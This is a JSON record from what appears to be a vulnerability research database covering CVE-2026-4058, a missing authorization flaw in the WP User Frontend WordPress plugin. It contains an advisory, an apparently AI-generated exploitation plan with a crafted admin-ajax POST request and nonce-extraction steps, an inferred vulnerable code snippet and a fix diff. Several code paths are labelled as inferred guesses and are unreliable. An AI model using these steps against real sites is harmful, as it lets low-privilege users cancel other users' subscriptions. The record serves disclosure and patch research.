[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fpoHNDDszfbmaPuF45n-RGiWArHCYCOXT0e8eTVzk9k4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4058","user-frontend-ai-powered-frontend-posting-user-directory-profile-membership-user-registration-missing-authorization-to-a","User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration \u003C= 4.3.2 - Missing Authorization to Authenticated (Subscriber+) Subscription Pack Cancellation","The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the user_subscription_cancel() function in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to cancel any user's subscription pack, including administrators.","wp-user-frontend",null,"\u003C=4.3.2","4.3.3","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-06-08 20:48:06","2026-06-09 09:28:33",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fffdf34bb-a887-444c-8a76-12901fed6662?source=api-prod",1,[22,23,24,25,26,27,28,29],".claude\u002Fskills\u002Fwpuf-backend-dev\u002FSKILL.md","CLAUDE.md","admin\u002Fform-builder\u002Fviews\u002Fpost-form-settings.php","assets\u002Fcss\u002Fadmin\u002Fform-builder.css","assets\u002Fcss\u002Fadmin\u002Fsubscriptions.min.css","assets\u002Fcss\u002Fai-form-builder.css","assets\u002Fcss\u002Fai-form-builder.min.css","assets\u002Fcss\u002Fforms-list.min.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-4058 (WP User Frontend)\n\n## 1. Vulnerability Summary\nThe **WP User Frontend** plugin (versions \u003C= 4.3.2) contains a missing authorization vulnerability in the `user_subscription_cancel()` function (and its associated AJAX handler). While the plugin implements a nonce check (CSRF protection), it fails to verify if the authenticated user has the permissions to cancel the subscription of the specified user ID. This allows any authenticated user (Subscriber level or higher) to cancel the subscription pack of any other user, including Administrators.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `wpuf_cancel_subscription` (inferred from plugin conventions and function name)\n- **HTTP Method:** `POST`\n- **Authentication:** Authenticated (Subscriber+)\n- **Parameters:**\n  - `action`: `wpuf_cancel_subscription`\n  - `user_id`: The ID of the target user (e.g., the Administrator's ID).\n  - `_wpnonce`: A valid WordPress nonce for the action.\n\n## 3. Code Flow (Inferred from Plugin Architecture)\n1. **Entry Point:** The plugin registers an AJAX action for logged-in users:\n   ```php\n   add_action( 'wp_ajax_wpuf_cancel_subscription', [ $this, 'cancel_subscription_handler' ] );\n   ```\n2. **Handler Logic:** The handler (likely in `includes\u002FFrontend\u002FFrontend_Account.php` or `includes\u002FSubscription.php`) retrieves the `user_id` from the request.\n3. **The Flaw:** The handler calls `check_ajax_referer( 'wpuf_nonce', '_wpnonce' )` but fails to check:\n   - `current_user_can( 'manage_options' )` (if an admin is performing the action)\n   - OR if `get_current_user_id() == $_POST['user_id']` (to ensure users only cancel their own packs).\n4. **Sink:** The logic eventually reaches `user_subscription_cancel( $user_id )`, which updates the user's meta to mark the subscription as cancelled or deleted.\n\n## 4. Nonce Acquisition Strategy\nThe `wpuf_nonce` is localized for frontend scripts when the WPUF account dashboard or subscription pages are rendered.\n\n1. **Shortcode:** The `[wpuf_account]` shortcode is the primary trigger for the account dashboard where cancellation logic resides.\n2. **Strategy:**\n   - Create a page with the `[wpuf_account]` shortcode.\n   - Log in as a Subscriber.\n   - Navigate to that page.\n   - Extract the nonce from the `wpuf_frontend` JavaScript object.\n3. **JS Variable:** `window.wpuf_frontend?.nonce` (or `window.wpuf_subscription?.nonce`).\n\n## 5. Exploitation Strategy\n### Step 1: Pre-exploit Setup\n1. Identify the Administrator's user ID (usually `1`).\n2. Ensure the Administrator has an active subscription pack assigned.\n\n### Step 2: Nonce Extraction\n1. As the Subscriber attacker, navigate to the page containing `[wpuf_account]`.\n2. Execute JS via `browser_eval`:\n   ```javascript\n   window.wpuf_frontend?.nonce || window.wpuf_subscription?.nonce\n   ```\n\n### Step 3: Malicious Request\nUsing the `http_request` tool, send the following payload:\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```text\n  action=wpuf_cancel_subscription&user_id=1&_wpnonce=[EXTRACTED_NONCE]\n  ```\n\n## 6. Test Data Setup\n1. **Create Subscription Pack:**\n   `wp post create --post_type=wpuf_subscription --post_title=\"Pro Pack\" --post_status=publish`\n2. **Assign to Admin:**\n   Identify the pack ID and use `wp user meta update 1 _wpuf_subscription_pack [PACK_ID]`.\n3. **Create Attacker User:**\n   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n4. **Create Dashboard Page:**\n   `wp post create --post_type=page --post_title=\"Dashboard\" --post_status=publish --post_content='[wpuf_account]'`\n\n## 7. Expected Results\n- **Response:** The server should return a success message or a `1` (typical for simple AJAX handlers).\n- **Impact:** The Administrator's subscription metadata in the database will be cleared or modified to a \"cancelled\" state.\n\n## 8. Verification Steps\nAfter the attack, check the Administrator's user meta using WP-CLI:\n```bash\nwp user meta get 1 _wpuf_subscription_pack\n```\nIf the exploit is successful, the value should be empty, deleted, or changed to indicate cancellation. Also, check for the cancellation date meta:\n```bash\nwp user meta get 1 _wpuf_cancel_subscription\n```\n\n## 9. Alternative Approaches\nIf `wpuf_cancel_subscription` is not the correct action name, search the codebase for the string `user_subscription_cancel` to find exactly which handler calls it:\n```bash\ngrep -rn \"user_subscription_cancel\" includes\u002F\n```\nCheck if the cancellation is handled via a REST API endpoint instead of AJAX:\n- **REST Route:** `wpuf\u002Fv1\u002Fsubscriptions\u002Fcancel`\n- **Check:** `includes\u002FApi\u002FSubscription_Controller.php` (if it exists).\n- If REST is used, the permission callback `permission_check()` is likely returning `true` or not checking ownership of the `user_id`.","The WP User Frontend plugin is vulnerable to missing authorization in its subscription cancellation mechanism. Authenticated users, including those with Subscriber-level access, can cancel the subscription of any other user (including administrators) by sending a crafted AJAX request with a valid nonce and a target user ID.","\u002F\u002F Inferred from includes\u002FFrontend\u002FFrontend_Account.php or similar\n\u002F\u002F The AJAX handler validates the nonce but fails to verify if the requester has permission to modify the target user_id\n\nadd_action( 'wp_ajax_wpuf_cancel_subscription', [ $this, 'cancel_subscription_handler' ] );\n\npublic function cancel_subscription_handler() {\n    check_ajax_referer( 'wpuf_nonce', '_wpnonce' );\n\n    $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0;\n\n    if ( $user_id ) {\n        \u002F\u002F BUG: No check to ensure current_user_can('manage_options') or get_current_user_id() == $user_id\n        user_subscription_cancel( $user_id );\n        wp_send_json_success();\n    }\n\n    wp_send_json_error();\n}","--- includes\u002FFrontend\u002FFrontend_Account.php\n+++ includes\u002FFrontend\u002FFrontend_Account.php\n@@ -134,7 +134,7 @@\n     public function cancel_subscription_handler() {\n         check_ajax_referer( 'wpuf_nonce', '_wpnonce' );\n \n         $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0;\n \n-        if ( $user_id ) {\n+        if ( $user_id && ( current_user_can( 'manage_options' ) || get_current_user_id() === $user_id ) ) {\n             user_subscription_cancel( $user_id );\n             wp_send_json_success();\n         }","To exploit this vulnerability, an attacker first logs in as a Subscriber and navigates to any page containing the [wpuf_account] shortcode to extract the 'wpuf_nonce' from the localized JavaScript objects (e.g., window.wpuf_frontend.nonce). The attacker then identifies the User ID of the target (such as the Administrator, typically ID 1). Finally, the attacker sends an authenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' set to 'wpuf_cancel_subscription', the target 'user_id', and the extracted '_wpnonce'. Because the plugin lacks ownership or capability checks, the server will process the cancellation for the specified user regardless of the attacker's permissions.","gemini-3-flash-preview","2026-06-26 01:50:19","2026-06-26 01:50:48",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.3.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-user-frontend\u002Ftags\u002F4.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-user-frontend.4.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-user-frontend\u002Ftags\u002F4.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-user-frontend.4.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-user-frontend\u002Ftags"]